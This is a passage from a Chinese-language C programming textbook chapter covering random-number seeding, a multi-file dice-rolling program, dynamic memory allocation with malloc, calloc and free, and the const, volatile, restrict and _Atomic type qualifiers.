s_and_r.c 一起编译 */ #include <stdio.h> #include <stdlib.h> extern void srand1(unsigned int x); extern int rand1(void); 897 int main(void) { int count; unsigned seed; printf("Please enter your choice for seed.\n"); while (scanf("%u", &seed) == 1) { srand1(seed);  /* 重置种子 */ for (count = 0; count < 5; count++) printf("%d\n", rand1()); printf("Please enter next seed (q to quit):\n"); } printf("Done\n"); return 0; } 编译两个文件,运行该程序后,其输出如下: 1 16838 5758 898 10113 17515 31051 Please enter next seed (q to quit): 513 20067 23475 8955 20841 15324 Please enter next seed (q to quit): q Done 设置seed的值为1,输出的结果与前面程序相同。但是设置seed的值为 513后就得到了新的结果。 注意 自动重置种子 如果 C 实现允许访问一些可变的量(如,时钟系统),可以用这些值 (可能会被截断)初始化种子值。例如,ANSI C有一个time()函数返回系统 时间。虽然时间单元因系统而异,但是重点是该返回值是一个可进行运算的 类型,而且其值随着时间变化而变化。time()返回值的类型名是time_t,具体 类型与系统有关。这没关系,我们可以使用强制类型转换: 899 #include <time.h> /* 提供time()的ANSI原型*/ srand1((unsigned int) time(0)); /* 初始化种子 */ 一般而言,time()接受的参数是一个 time_t 类型对象的地址,而时间值 就储存在传入的地址上。当然,也可以传入空指针(0)作为参数,这种情 况下,只能通过返回值机制来提供值。 可以把这个技巧应用于标准的ANSI C函数srand()和rand()中。如果使用 这些函数,要在文件中包含stdlib.c头文件。实际上,既然已经明白了 srand1()和rand1()如何使用内部链接的静态变量,你也可以使用编译器提供 的版本。我们将在下一个示例中这样做。 900 12.3 掷骰子 我们将要模拟一个非常流行的游戏——掷骰子。骰子的形式多种多样, 最普遍的是使用两个6面骰子。在一些冒险游戏中,会使用5种骰子:4面、6 面、8面、12面和20面。聪明的古希腊人证明了只有5种正多面体,它们的所 有面都具有相同的形状和大小。各种不同类型的骰子就是根据这些正多面体 发展而来。也可以做成其他面数的,但是其所有的面不会都相等,因此各个 面朝上的几率就不同。 计算机计算不用考虑几何的限制,所以可以设计任意面数的电子骰子。 我们先从6面开始。 我们想获得1~6的随机数。然而,rand()生成的随机数在0~ RAND_MAX之间。RAND_MAX被定义在stdlib.h中,其值通常是 INT_MAX。因此,需要进行一些调整,方法如下。 1.把随机数求模6,获得的整数在0~5之间。 2.结果加1,新值在1~6之间。 3.为方便以后扩展,把第1步中的数字6替换成骰子面数。 下面的代码实现了这3个步骤: #include <stdlib.h> /* 提供rand()的原型 */ int rollem(int sides) { int roll; roll = rand() % sides + 1; return roll; 901 } 我们还想用一个函数提示用户选择任意面数的骰子,并返回点数总和。 如程序清单12.11所示。 程序清单12.11 diceroll.c程序 /* diceroll.c -- 掷骰子模拟程序 */ /* 与 mandydice.c 一起编译 */ #include "diceroll.h" #include <stdio.h> #include <stdlib.h>      /* 提供库函数 rand()的原型 */ int roll_count = 0;      /* 外部链接 */ static int rollem(int sides)  /* 该函数属于该文件私有 */ { int roll; roll = rand() % sides + 1; ++roll_count;       /* 计算函数调用次数 */ return roll; } int roll_n_dice(int dice, int sides) { 902 int d; int total = 0; if (sides < 2) { printf("Need at least 2 sides.\n"); return -2; } if (dice < 1) { printf("Need at least 1 die.\n"); return -1; } for (d = 0; d < dice; d++) total += rollem(sides); return total; } 该文件加入了新元素。第一,rollem()函数属于该文件私有,它是 roll_n_dice()的辅助函数。第二,为了演示外部链接的特性,该文件声明了 
一个外部变量roll_count。该变量统计调用rollem()函数的次数。这样设计有 点蹩脚,仅为了演示外部变量的特性。第三,该文件包含以下预处理指令: 903 #include "diceroll.h" 如果使用标准库函数,如 rand(),要在当前文件中包含标准头文件(对 rand()而言要包含stdlib.h),而不是声明该函数。因为头文件中已经包含了 正确的函数原型。我们效仿这一做法,把roll_n_dice()函数的原型放在 diceroll.h头文件中。把文件名放在双引号中而不是尖括号中,指示编译器在 本地查找文件,而不是到编译器存放标准头文件的位置去查找文件。“本地 查找”的含义取决于具体的实现。一些常见的实现把头文件与源代码文件或 工程文件(如果编译器使用它们的话)放在相同的目录或文件夹中。程序清 单12.12是头文件中的内容。 程序清单12.12 diceroll.h文件 //diceroll.h extern int roll_count; int roll_n_dice(int dice, int sides); 该头文件中包含一个函数原型和一个 extern 声明。由于 direroll.c 文件 包含了该文件, direroll.c实际上包含了roll_count的两个声明: extern int roll_count;   // 头文件中的声明(引用式声明) int roll_count = 0;     // 源代码文件中的声明(定义式声明) 这样做没问题。一个变量只能有一个定义式声明,但是带 extern 的声明 是引用式声明,可以有多个引用式声明。 使用 roll_n_dice()函数的程序都要包含 diceroll.c 头文件。包含该头文件 后,程序便可使用roll_n_dice()函数和roll_count变量。如程序清单12.13所 示。 程序清单12.13 manydice.c文件 904 /* manydice.c -- 多次掷骰子的模拟程序 */ /* 与 diceroll.c 一起编译*/ #include <stdio.h> #include <stdlib.h>    /* 为库函数 srand() 提供原型 */ #include <time.h>     /* 为 time() 提供原型      */ #include "diceroll.h"   /* 为roll_n_dice()提供原型,为roll_count变量 提供声明 */ int main(void) { int dice, roll; int sides; int status; srand((unsigned int) time(0)); /* 随机种子 */ printf("Enter the number of sides per die, 0 to stop.\n"); while (scanf("%d", &sides) == 1 && sides > 0) { printf("How many dice?\n"); if ((status = scanf("%d", &dice)) != 1) { 905 if (status == EOF) break;       /* 退出循环 */ else { printf("You should have entered an integer."); printf(" Let's begin again.\n"); while (getchar() != '\n') continue;   /* 处理错误的输入 */ printf("How many sides? Enter 0 to stop.\n"); continue;       /* 进入循环的下一轮迭代 */ } } roll = roll_n_dice(dice, sides); printf("You have rolled a %d using %d %d-sided dice.\n", roll, dice, sides); printf("How many sides? Enter 0 to stop.\n"); } printf("The rollem() function was called %d times.\n", roll_count);     /* 使用外部变量 */ 906 printf("GOOD FORTUNE TO YOU!\n"); return 0; } 要与包含程序清单12.11的文件一起编译该文件。可以把程序清单 12.11、12.12和12.13都放在同一文件夹或目录中。运行该程序,下面是一个 输出示例: Enter the number of sides per die, 0 to stop. 6 How many dice? 2 You have rolled a 12 using 2 6-sided dice. How many sides? Enter 0 to stop. 6 How many dice? 2 You have rolled a 4 using 2 6-sided dice. How many sides? Enter 0 to stop. 6 How many dice? 2 907 You have rolled a 5 using 2 6-sided dice. How many sides? Enter 0 to stop. 0 The rollem() function was called 6 times. GOOD FORTUNE TO YOU! 因为该程序使用了srand()随机生成随机数种子,所以大多数情况下,即 使输入相同也很难得到相同的输出。注意,manydice.c中的main()访问了定 义在diceroll.c中的roll_count变量。 有3种情况可以导致外层while循环结束:side小于1、输入类型不匹配 (此时scanf()返回0)、遇到文件结尾(返回值是EOF)。为了读取骰子的 点数,该程序处理文件结尾的方式(退出while循环)与处理类型不匹配 (进入循环的下一轮迭代)的情况不同。 可以通过多种方式使用roll_n_dice()。sides等于2时,程序模仿掷硬 币,“正面朝上”为2,“反面朝上”为1(或者反过来表示也行)。很容易修改 该程序单独显示点数的结果,或者构建一个骰子模拟器。如果要掷多次骰子 (如在一些角色扮演类游戏中),可以很容易地修改程序以输出类似的结 果: Enter the number of sets; enter q to stop. 18 How many sides and how many dice? 6 3 Here are 18 sets of 3 6-sided throws. 908 12 10 6 9 8 14 8 15 9 14 12 17 11 7 10 13 8 14 How many sets? Enter q to stop. 
q rand1()或 rand()(不是 rollem())还可以用来创建一个猜数字程序,让 计算机选定一个数字,你来猜。读者感兴趣的话可以自己编写这个程序。 909 12.4 分配内存:malloc()和free() 我们前面讨论的存储类别有一个共同之处:在确定用哪种存储类别后, 根据已制定好的内存管理规则,将自动选择其作用域和存储期。然而,还有 更灵活地选择,即用库函数分配和管理内存。 首先,回顾一下内存分配。所有程序都必须预留足够的内存来储存程序 使用的数据。这些内存中有些是自动分配的。例如,以下声明: float x; char place[] = "Dancing Oxen Creek"; 为一个float类型的值和一个字符串预留了足够的内存,或者可以显式指 定分配一定数量的内存: int plates[100]; 该声明预留了100个内存位置,每个位置都用于储存int类型的值。声明 还为内存提供了一个标识符。因此,可以使用x或place识别数据。回忆一 下,静态数据在程序载入内存时分配,而自动数据在程序执行块时分配,并 在程序离开该块时销毁。 C 能做的不止这些。可以在程序运行时分配更多的内存。主要的工具是 malloc()函数,该函数接受一个参数:所需的内存字节数。malloc()函数会找 到合适的空闲内存块,这样的内存是匿名的。也就是说, malloc()分配内 存,但是不会为其赋名。然而,它确实返回动态分配内存块的首字节地址。 因此,可以把该地址赋给一个指针变量,并使用指针访问这块内存。因为 char表示1字节,malloc()的返回类型通常被定义为指向char的指针。然而, 从ANSI C标准开始,C使用一个新的类型:指向void的指针。该类型相当于 一个“通用指针”。malloc()函数可用于返回指向数组的指针、指向结构的指 针等,所以通常该函数的返回值会被强制转换为匹配的类型。在ANSI C 中,应该坚持使用强制类型转换,提高代码的可读性。然而,把指向 void 910 的指针赋给任意类型的指针完全不用考虑类型匹配的问题。如果 malloc()分 配内存失败,将返回空指针。 我们试着用 malloc()创建一个数组。除了用 malloc()在程序运行时请求 一块内存,还需要一个指针记录这块内存的位置。例如,考虑下面的代码: double * ptd; ptd = (double *) malloc(30 * sizeof(double)); 以上代码为30个double类型的值请求内存空间,并设置ptd指向该位置。 注意,指针ptd被声明为指向一个double类型,而不是指向内含30个double类 型值的块。回忆一下,数组名是该数组首元素的地址。因此,如果让ptd指 向这个块的首元素,便可像使用数组名一样使用它。也就是说,可以使用表 达式ptd[0]访问该块的首元素,ptd[1]访问第2个元素,以此类推。根据前面 所学的知识,可以使用数组名来表示指针,也可以用指针来表示数组。 现在,我们有3种创建数组的方法。 声明数组时,用常量表达式表示数组的维度,用数组名访问数组的元 素。可以用静态内存或自动内存创建这种数组。 声明变长数组(C99新增的特性)时,用变量表达式表示数组的维度, 用数组名访问数组的元素。具有这种特性的数组只能在自动内存中创建。 声明一个指针,调用malloc(),将其返回值赋给指针,使用指针访问数 组的元素。该指针可以是静态的或自动的。 使用第2种和第3种方法可以创建动态数组(dynamic array)。这种数组 和普通数组不同,可以在程序运行时选择数组的大小和分配内存。例如,假 设n是一个整型变量。在C99之前,不能这样做: double item[n]; /* C99之前:n不允许是变量 */ 但是,可以这样做: 911 ptd = (double *) malloc(n * sizeof(double)); /* 可以 */ 如你所见,这比变长数组更灵活。 通常,malloc()要与free()配套使用。free()函数的参数是之前malloc()返 回的地址,该函数释放之前malloc()分配的内存。因此,动态分配内存的存 储期从调用malloc()分配内存到调用free()释放内存为止。设想malloc()和 free()管理着一个内存池。每次调用malloc()分配内存给程序使用,每次调用 free()把内存归还内存池中,这样便可重复使用这些内存。free()的参数应该 是一个指针,指向由 malloc()分配的一块内存。不能用 free()释放通过其他 方式(如,声明一个数组)分配的内存。malloc()和free()的原型都在stdlib.h 头文件中。 使用malloc(),程序可以在运行时才确定数组大小。如程序清单12.14所 示,它把内存块的地址赋给指针 ptd,然后便可以使用数组名的方式使用 ptd。另外,如果内存分配失败,可以调用 exit()函数结束程序,其原型在 stdlib.h中。EXIT_FAILURE的值也被定义在stdlib.h中。标准提供了两个返回 值以保证在所有操作系统中都能正常工作:EXIT_SUCCESS(或者,相当于 0)表示普通的程序结束, EXIT_FAILURE 表示程序异常中止。一些操作系 统(包括 UNIX、Linux 和 Windows)还接受一些表示其他运行错误的整数 值。 程序清单12.14 dyn_arr.c程序 /* dyn_arr.c -- 动态分配数组 */ #include <stdio.h> #include <stdlib.h> /* 为 malloc()、free()提供原型 */ int main(void) { 912 double * ptd; int max; int number; int i = 0; puts("What is the maximum number of type double entries?"); if (scanf("%d", &max) != 1) { puts("Number not correctly entered -- bye."); exit(EXIT_FAILURE); } ptd = (double *) malloc(max * sizeof(double)); if (ptd == NULL) { puts("Memory allocation failed. Goodbye."); exit(EXIT_FAILURE); } /* ptd 现在指向有max个元素的数组 */ puts("Enter the values (q to quit):"); while (i < max && scanf("%lf", &ptd[i]) == 1) 913 ++i; printf("Here are your %d entries:\n", number = i); for (i = 0; i < number; i++) { printf("%7.2f ", ptd[i]); if (i % 7 == 6) putchar('\n'); } if (i % 7 != 0) putchar('\n'); puts("Done."); free(ptd); return 0; } 下面是该程序的运行示例。程序通过交互的方式让用户先确定数组的大 小,我们设置数组大小为 5。虽然我们后来输入了6个数,但程序也只处理 前5个数。 What is the maximum number of entries? 5 Enter the values (q to quit): 914 20 30 35 25 40 80 Here are your 5 entries: 20.00 30.00 35.00 25.00 40.00 Done. 
该程序通过以下代码获取数组的大小: if (scanf("%d", &max) != 1) { puts("Number not correctly entered -- bye."); exit(EXIT_FAILURE); } 接下来,分配足够的内存空间以储存用户要存入的所有数,然后把动态 分配的内存地址赋给指针ptd: ptd = (double *) malloc(max * sizeof (double)); 在C中,不一定要使用强制类型转换(double *),但是在C++中必须使 用。所以,使用强制类型转换更容易把C程序转换为C++程序。 malloc()可能分配不到所需的内存。在这种情况下,该函数返回空指 针,程序结束: if (ptd == NULL) { puts("Memory allocation failed. Goodbye."); 915 exit(EXIT_FAILURE); } 如果程序成功分配内存,便可把ptd视为一个有max个元素的数组名。 注意,free()函数位于程序的末尾,它释放了malloc()函数分配的内存。 free()函数只释放其参数指向的内存块。一些操作系统在程序结束时会自动 释放动态分配的内存,但是有些系统不会。为保险起见,请使用free(),不 要依赖操作系统来清理。 使用动态数组有什么好处?从本例来看,使用动态数组给程序带来了更 多灵活性。假设你已经知道,在大多数情况下程序所用的数组都不会超过 100个元素,但是有时程序确实需要10000个元素。要是按照平时的做法,你 不得不为这种情况声明一个内含 10000 个元素的数组。基本上这样做是在浪 费内存。如果需要10001个元素,该程序就会出错。这种情况下,可以使用 一个动态数组调整程序以适应不同的情况。 12.4.1 free()的重要性 静态内存的数量在编译时是固定的,在程序运行期间也不会改变。自动 变量使用的内存数量在程序执行期间自动增加或减少。但是动态分配的内存 数量只会增加,除非用 free()进行释放。例如,假设有一个创建数组临时副 本的函数,其代码框架如下: ... int main() { double glad[2000]; int i; 916 ... for (i = 0; i < 1000; i++) gobble(glad, 2000); ... } void gobble(double ar[], int n) { double * temp = (double *) malloc( n * sizeof(double)); .../* free(temp); // 假设忘记使用free() */ } 第1次调用gobble()时,它创建了指针temp,并调用malloc()分配了16000 字节的内存(假设double为8 字节)。假设如代码注释所示,遗漏了free()。 当函数结束时,作为自动变量的指针temp也会消失。但是它所指向的16000 字节的内存却仍然存在。由于temp指针已被销毁,所以无法访问这块内存, 它也不能被重复使用,因为代码中没有调用free()释放这块内存。 第2次调用gobble()时,它又创建了指针temp,并调用malloc()分配了 16000字节的内存。第1次分配的16000字节内存已不可用,所以malloc()分配 了另外一块16000字节的内存。当函数结束时,该内存块也无法被再访问和 再使用。 循环要执行1000次,所以在循环结束时,内存池中有1600万字节被占 用。实际上,也许在循环结束之前就已耗尽所有的内存。这类问题被称为内 存泄漏(memory leak)。在函数末尾处调用free()函数可避免这类问题发 生。 917 12.4.2 calloc()函数 分配内存还可以使用calloc(),典型的用法如下: long * newmem; newmem = (long *)calloc(100, sizeof (long)); 和malloc()类似,在ANSI之前,calloc()也返回指向char的指针;在ANSI 之后,返回指向void的指针。如果要储存不同的类型,应使用强制类型转换 运算符。calloc()函数接受两个无符号整数作为参数(ANSI规定是size_t类 型)。第1个参数是所需的存储单元数量,第2个参数是存储单元的大小(以 字节为单位)。在该例中,long为4字节,所以,前面的代码创建了100个4 字节的存储单元,总共400字节。 用sizeof(long)而不是4,提高了代码的可移植性。这样,在其他long不是 4字节的系统中也能正常工作。 calloc()函数还有一个特性:它把块中的所有位都设置为0(注意,在某 些硬件系统中,不是把所有位都设置为0来表示浮点值0)。 free()函数也可用于释放calloc()分配的内存。 动态内存分配是许多高级程序设计技巧的关键。我们将在第17章中详细 讲解。有些编译器可能还提供其他内存管理函数,有些可以移植,有些不可 以。读者可以抽时间看一下。 12.4.3 动态内存分配和变长数组 变长数组(VLA)和调用 malloc()在功能上有些重合。例如,两者都可 用于创建在运行时确定大小的数组: int vlamal() { 918 int n; int * pi; scanf("%d", &n); pi = (int *) malloc (n * sizeof(int)); int ar[n];// 变长数组 pi[2] = ar[2] = -5; ... 
} 不同的是,变长数组是自动存储类型。因此,程序在离开变长数组定义 所在的块时(该例中,即vlamal()函数结束时),变长数组占用的内存空间 会被自动释放,不必使用 free()。另一方面,用malloc()创建的数组不必局限 在一个函数内访问。例如,可以这样做:被调函数创建一个数组并返回指 针,供主调函数访问,然后主调函数在末尾调用free()释放之前被调函数分 配的内存。另外,free()所用的指针变量可以与 malloc()的指针变量不同,但 是两个指针必须储存相同的地址。但是,不能释放同一块内存两次。 对多维数组而言,使用变长数组更方便。当然,也可以用 malloc()创建 二维数组,但是语法比较繁琐。如果编译器不支持变长数组特性,就只能固 定二维数组的维度,如下所示: int n = 5; int m = 6; int ar2[n][m]; // n×m的变长数组(VLA) int (* p2)[6]; // C99之前的写法 919 int (* p3)[m]; // 要求支持变长数组 p2 = (int (*)[6]) malloc(n * 6 * sizeof(int)); // n×6 数组 p3 = (int (*)[m]) malloc(n * m * sizeof(int)); // n×m 数组(要求支持变长数 组) ar2[1][2] = p2[1][2] = 12; 先复习一下指针声明。由于malloc()函数返回一个指针,所以p2必须是 一个指向合适类型的指针。第1个指针声明: int (* p2)[6]; // C99之前的写法 表明p2指向一个内含6个int类型值的数组。因此,p2[i]代表一个由6个整 数构成的元素,p2[i][j]代表一个整数。 第2个指针声明用一个变量指定p3所指向数组的大小。因此,p3代表一 个指向变长数组的指针,这行代码不能在C90标准中运行。 12.4.4 存储类别和动态内存分配 存储类别和动态内存分配有何联系?我们来看一个理想化模型。可以认 为程序把它可用的内存分为 3部分:一部分供具有外部链接、内部链接和无 链接的静态变量使用;一部分供自动变量使用;一部分供动态内存分配。 静态存储类别所用的内存数量在编译时确定,只要程序还在运行,就可 访问储存在该部分的数据。该类别的变量在程序开始执行时被创建,在程序 结束时被销毁。 然而,自动存储类别的变量在程序进入变量定义所在块时存在,在程序 离开块时消失。因此,随着程序调用函数和函数结束,自动变量所用的内存 数量也相应地增加和减少。这部分的内存通常作为栈来处理,这意味着新创 建的变量按顺序加入内存,然后以相反的顺序销毁。 920 动态分配的内存在调用 malloc()或相关函数时存在,在调用 free()后释 放。这部分的内存由程序员管理,而不是一套规则。所以内存块可以在一个 函数中创建,在另一个函数中销毁。正是因为这样,这部分的内存用于动态 内存分配会支离破碎。也就是说,未使用的内存块分散在已使用的内存块之 间。另外,使用动态内存通常比使用栈内存慢。 总而言之,程序把静态对象、自动对象和动态分配的对象储存在不同的 区域。 程序清单12.15 where.c程序 // where.c -- 数据被储存在何处? #include <stdio.h> #include <stdlib.h> #include <string.h> int static_store = 30; const char * pcg = "String Literal"; int main() { int auto_store = 40; char auto_string [] = "Auto char Array"; int * pi; char * pcl; pi = (int *) malloc(sizeof(int)); 921 *pi = 35; pcl = (char *) malloc(strlen("Dynamic String") + 1); strcpy(pcl, "Dynamic String"); printf("static_store: %d at %p\n", static_store, &static_store); printf("  auto_store: %d at %p\n", auto_store, &auto_store); printf("    *pi: %d at %p\n", *pi, pi); printf("  %s at %p\n", pcg, pcg); printf(" %s at %p\n", auto_string, auto_string); printf("  %s at %p\n", pcl, pcl); printf("  %s at %p\n", "Quoted String", "Quoted String"); free(pi); free(pcl); return 0; } 在我们的系统中,该程序的输入如下: static_store: 30 at 00378000 auto_store: 40 at 0049FB8C *pi: 35 at 008E9BA0 String Literal at 00375858 922 Auto char Array at 0049FB74 Dynamic String at 008E9BD0 Quoted String at 00375908 如上所示,静态数据(包括字符串字面量)占用一个区域,自动数据占 用另一个区域,动态分配的数据占用第3个区域(通常被称为内存堆或自由 内存)。 923 12.5 ANSI C类型限定符 我们通常用类型和存储类别来描述一个变量。C90 还新增了两个属性: 恒常性(constancy)和易变性(volatility)。这两个属性可以分别用关键字 const 和 volatile 来声明,以这两个关键字创建的类型是限定类型(qualified type)。C99标准新增了第3个限定符:restrict,用于提高编译器优化。C11 标准新增了第4个限定符:_Atomic。C11提供一个可选库,由stdatomic.h管 理,以支持并发程序设计,而且_Atomic是可选支持项。 C99 为类型限定符增加了一个新属性:它们现在是幂等的 (idempotent)!这个属性听起来很强大,其实意思是可以在一条声明中多 次使用同一个限定符,多余的限定符将被忽略: const const const int n = 6; // 与 const int n = 6;相同 有了这个新属性,就可以编写类似下面的代码: typedef const int zip; const zip q = 8; 12.5.1 const类型限定符 第4章和第10章中介绍过const。以const关键字声明的对象,其值不能通 过赋值或递增、递减来修改。在ANSI兼容的编译器中,以下代码: const int nochange;  /* 限定nochange的值不能被修改 */ nochange = 12;    /* 不允许 */ 编译器会报错。但是,可以初始化const变量。因此,下面的代码没问 题: const int nochange = 12; /* 没问题 */ 924 该声明让nochange成为只读变量。初始化后,就不能再改变它的值。 可以用const关键字创建不允许修改的数组: const int days1[12] = {31,28,31,30,31,30,31,31,30,31,30,31}; 1.在指针和形参声明中使用const 声明普通变量和数组时使用 const 关键字很简单。指针则复杂一些,因 为要区分是限定指针本身为const还是限定指针指向的值为const。下面的声 明: const float * pf; /* pf 指向一个float类型的const值 */ 创建了 pf 指向的值不能被改变,而 pt 本身的值可以改变。例如,可以 设置该指针指向其他 const值。相比之下,下面的声明: float * const pt; /* pt 是一个const指针 */ 创建的指针pt本身的值不能更改。pt必须指向同一个地址,但是它所指 向的值可以改变。下面的声明: const float * const ptr; 
表明ptr既不能指向别处，它所指向的值也不能改变。

还可以把const放在第3个位置：

float const * pfc; // 与const float * pfc;相同

如注释所示，把const放在类型名之后、*之前，说明该指针不能用于改变它所指向的值。简而言之，const放在*左侧任意位置，限定了指针指向的数据不能改变；const放在*的右侧，限定了指针本身不能改变。

const 关键字的常见用法是声明为函数形参的指针。例如，假设有一个函数要调用 display()显示一个数组的内容。要把数组名作为实际参数传递给该函数，但是数组名是一个地址。该函数可能会更改主调函数中的数据，但是下面的原型保证了数据不会被更改：

void display(const int array[], int limit);

在函数原型和函数头，形参声明const int array[]与const int * array相同，所以该声明表明不能更改array指向的数据。

ANSI C库遵循这种做法。如果一个指针仅用于给函数访问值，应将其声明为一个指向const限定类型的指针。如果要用指针更改主调函数中的数据，就不使用const关键字。例如，ANSI C中的strcat()原型如下：

char *strcat(char * restrict s1, const char * restrict s2);

回忆一下，strcat()函数在第1个字符串的末尾添加第2个字符串的副本。这更改了第1个字符串，但是未更改第2个字符串。上面的声明体现了这一点。

2.对全局数据使用const

前面讲过，使用全局变量是一种冒险的方法，因为这样做暴露了数据，程序的任何部分都能更改数据。如果把数据设置为 const，就可避免这样的危险，因此用 const 限定符声明全局数据很合理。可以创建const变量、const数组和const结构（结构是一种复合数据类型，将在下一章介绍）。

然而，在文件间共享const数据要小心。可以采用两个策略。第一，遵循外部变量的常用规则，即在一个文件中使用定义式声明，在其他文件中使用引用式声明（用extern关键字）：

/* file1.c -- 定义了一些外部const变量 */
const double PI = 3.14159;
const char * MONTHS[12] =
{
    "January", "February", "March", "April", "May",
    "June", "July", "August", "September", "October",
    "November", "December"
};

/* file2.c -- 使用定义在别处的外部const变量 */
extern const double PI;
extern const char * MONTHS[];

另一种方案是，把const变量放在一个头文件中，然后在其他文件中包含该头文件：

/* constant.h -- 定义了一些外部const变量 */
static const double PI = 3.14159;
static const char * MONTHS[12] =
{
    "January", "February", "March", "April", "May",
    "June", "July", "August", "September", "October",
    "November", "December"
};

/* file1.c -- 使用定义在别处的外部const变量 */
#include "constant.h"

/* file2.c -- 使用定义在别处的外部const变量 */
#include "constant.h"

这种方案必须在头文件中用关键字static声明全局const变量。如果去掉static，那么在file1.c和file2.c中包含constant.h将导致每个文件中都有一个相同标识符的定义式声明，C标准不允许这样做（然而，有些编译器允许）。实际上，这种方案相当于给每个文件提供了一个单独的数据副本[1]。由于每个副本只对该文件可见，所以无法用这些数据和其他文件通信。不过没关系，它们都是完全相同（每个文件都包含相同的头文件）的const数据（声明时使用了const关键字），这不是问题。

头文件方案的好处是，方便你偷懒，不用惦记着在一个文件中使用定义式声明，在其他文件中使用引用式声明。所有的文件都只需包含同一个头文件即可。但它的缺点是，数据是重复的。对于前面的例子而言，这不算什么问题，但是如果const数据包含庞大的数组，就不能视而不见了。

12.5.2 volatile类型限定符

volatile 限定符告知计算机，代理（而不是变量所在的程序）可以改变该变量的值。通常，它被用于硬件地址以及在其他程序或同时运行的线程中共享数据。例如，一个地址上可能储存着当前的时钟时间，无论程序做什么，地址上的值都随时间的变化而改变。或者一个地址用于接收另一台计算机传入的信息。

volatile的语法和const一样：

volatile int loc1;    /* loc1 是一个易变的位置 */
volatile int * ploc;  /* ploc 是一个指向易变的位置的指针 */

以上代码把loc1声明为volatile变量，把ploc声明为指向volatile变量的指针。

读者可能认为volatile是个可有可无的概念，为何ANSI委员会把volatile关键字放入标准？原因是它涉及编译器的优化。例如，假设有下面的代码：

val1 = x;
/* 一些不使用 x 的代码 */
val2 = x;

智能的（进行优化的）编译器会注意到以上代码使用了两次 x，但并未改变它的值。于是编译器把 x的值临时储存在寄存器中，然后在val2需要使用x时，才从寄存器中（而不是从原始内存位置上）读取x的值，以节约时间。这个过程被称为高速缓存（caching）。通常，高速缓存是个不错的优化方案，但是如果一些其他代理在以上两条语句之间改变了x的值，就不能这样优化了。如果没有volatile关键字，编译器就不知道这种事情是否会发生。因此，为安全起见，编译器不会进行高速缓存。这是在 ANSI 之前的情况。现在，如果声明中没有volatile关键字，编译器会假定变量的值在使用过程中不变，然后再尝试优化代码。

可以同时用const和volatile限定一个值。例如，通常用const把硬件时钟设置为程序不能更改的变量，但是可以通过代理改变，这时用 volatile。可以在同一条声明中同时使用这两个限定符，它们的顺序不重要，如下所示：

volatile const int loc;
const volatile int * ploc;

12.5.3 restrict类型限定符

restrict 关键字允许编译器优化某部分代码以更好地支持计算。它只能用于指针，表明该指针是访问数据对象的唯一且初始的方式。要弄明白为什么这样做有用，先看几个例子。考虑下面的代码：

int ar[10];
int * restrict restar = (int *) malloc(10 * sizeof(int));
int * par = ar;

这里，指针restar是访问由malloc()所分配内存的唯一且初始的方式。因此，可以用restrict关键字限定它。而指针par既不是访问ar数组中数据的初始方式，也不是唯一方式。所以不用把它设置为restrict。

现在考虑下面稍复杂的例子，其中n是int类型：

for (n = 0; n < 10; n++)
{
    par[n] += 5;
    restar[n] += 5;
    ar[n] *= 2;
    par[n] += 3;
    restar[n] += 3;
}

由于之前声明了 restar 是访问它所指向的数据块的唯一且初始的方式，编译器可以把涉及 restar的两条语句替换成下面这条语句，效果相同：

restar[n] += 8; /* 可以进行替换 */

但是，如果把与par相关的两条语句替换成下面的语句，将导致计算错误：

par[n] += 8; /* 给出错误的结果 */

这是因为for循环在par两次访问相同的数据之间，用ar改变了该数据的值。
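代入一组具体的数字更容易看出差别。假设进入某轮循环时 ar[n]（也就是par[n]所指向的值）和 restar[n] 都恰好是2（这个初值只是为了演示而假设的）：

按原来的顺序逐条执行：par[n] 先变为 2 + 5 = 7，ar[n] *= 2 后变为 14，再加 3 得 17；而 restar[n] 为 2 + 5 + 3 = 10。
若把 par 的两条语句合并为 par[n] += 8：放在 ar[n] *= 2 之前得 (2 + 8) * 2 = 20，放在其后得 2 * 2 + 8 = 12，都不是正确结果 17。
把 restar 的两条语句合并为 restar[n] += 8 则仍得 2 + 8 = 10，与逐条执行的结果相同。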
在本例中,如果未使用restrict关键字,编译器就必须假设最坏的情况 (即,在两次使用指针之间,其他的标识符可能已经改变了数据)。如果用 了restrict关键字,编译器就可以选择捷径优化计算。 restrict 限定符还可用于函数形参中的指针。这意味着编译器可以假定 930 在函数体内其他标识符不会修改该指针指向的数据,而且编译器可以尝试对 其优化,使其不做别的用途。例如,C 库有两个函数用于把一个位置上的字 节拷贝到另一个位置。在C99中,这两个函数的原型是: void * memcpy(void * restrict s1, const void * restrict s2, size_t n); void * memmove(void * s1, const void * s2, size_t n); 这两个函数都从位置s2把n字节拷贝到位置s1。memcpy()函数要求两个 位置不重叠,但是memove()没有这样的要求。声明s1和s2为restrict说明这两 个指针都是访问相应数据的唯一方式,所以它们不能访问相同块的数据。这 满足了memcpy()无重叠的要求。memmove()函数允许重叠,它在拷贝数据时 不得不更小心,以防在使用数据之前就先覆盖了数据。 restrict 关键字有两个读者。一个是编译器,该关键字告知编译器可以 自由假定一些优化方案。另一个读者是用户,该关键字告知用户要使用满足 restrict要求的参数。总而言之,编译器不会检查用户是否遵循这一限制,但 是无视它后果自负。 12.5.4 _Atomic类型限定符(C11) 并发程序设计把程序执行分成可以同时执行的多个线程。这给程序设计 带来了新的挑战,包括如何管理访问相同数据的不同线程。C11通过包含可 选的头文件stdatomic.h和threads.h,提供了一些可选的(不是必须实现的) 管理方法。值得注意的是,要通过各种宏函数来访问原子类型。当一个线程 对一个原子类型的对象执行原子操作时,其他线程不能访问该对象。例如, 下面的代码: int hogs;// 普通声明 hogs = 12;  // 普通赋值 可以替换成: 931 _Atomic int hogs;      // hogs 是一个原子类型的变量 atomic_store(&hogs, 12);  // stdatomic.h中的宏 这里,在hogs中储存12是一个原子过程,其他线程不能访问hogs。 编写这种代码的前提是,编译器要支持这一新特性。 12.5.5 旧关键字的新位置 C99允许把类型限定符和存储类别说明符static放在函数原型和函数头的 形式参数的初始方括号中。对于类型限定符而言,这样做为现有功能提供了 一个替代的语法。例如,下面是旧式语法的声明: void ofmouth(int * const a1, int * restrict a2, int n); // 以前的风格 该声明表明a1是一个指向int的const指针,这意味着不能更改指针本身, 可以更改指针指向的数据。除此之外,还表明a2是一个restrict指针,如上一 节所述。新的等价语法如下: void ofmouth(int a1[const], int a2[restrict], int n); // C99允许 根据新标准,在声明函数形参时,指针表示法和数组表示法都可以使用 这两个限定符。 static的情况不同,因为新标准为static引入了一种与以前用法不相关的 新用法。现在,static除了表明静态存储类别变量的作用域或链接外,新的 用法告知编译器如何使用形式参数。例如,考虑下面的原型: double stick(double ar[static 20]); static 的这种用法表明,函数调用中的实际参数应该是一个指向数组首 